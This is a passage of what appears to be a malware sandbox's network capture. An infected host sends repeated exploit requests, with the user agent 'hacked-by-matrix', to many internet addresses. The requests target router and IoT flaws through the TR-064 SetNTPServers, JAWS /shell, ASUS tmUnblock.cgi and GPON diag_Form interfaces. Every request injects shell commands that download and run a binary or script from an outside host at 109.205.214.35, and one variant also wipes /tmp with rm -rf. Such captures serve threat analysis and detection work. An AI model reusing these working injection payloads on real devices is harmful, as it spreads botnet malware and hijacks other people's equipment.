                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:18.444245100 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:25.356245041 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:39.180243969 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1045192.168.2.1335612109.69.232.16280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.659475088 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:11.843940973 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:11 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1046192.168.2.135060012.131.182.13680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.659526110 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:11.844264984 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Thu, 21 Mar 2024 04:23:11 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                        Mar 21, 2024 05:23:12.397756100 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Thu, 21 Mar 2024 04:23:11 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1047192.168.2.135651837.36.79.767547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.811244965 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1048192.168.2.134594288.206.97.1137547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.862040043 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:12.092726946 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 09:23:11 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found
                                                        Mar 21, 2024 05:23:12.787794113 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 09:23:11 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1049192.168.2.135149234.43.231.1477547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.927850008 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1050192.168.2.1358848172.65.26.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.977518082 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1051192.168.2.135155234.43.231.1477547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.035351038 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1052192.168.2.1339352172.87.201.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.046572924 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:16.142712116 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:22.287373066 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:34.316256046 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1053192.168.2.133507231.111.34.1657547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.052550077 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1054192.168.2.1350680172.64.30.318080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.055126905 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1055192.168.2.1348946172.67.231.208080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.067456007 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1056192.168.2.1346018172.65.65.628080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.067792892 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1057192.168.2.1342890172.67.62.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.069601059 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1058192.168.2.1342692173.255.131.10180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.092729092 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:12.566272020 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:12.712012053 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:12 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; }
                                                        Mar 21, 2024 05:23:12.712104082 CET1286INData Raw: 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                        Data Ascii: .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat;
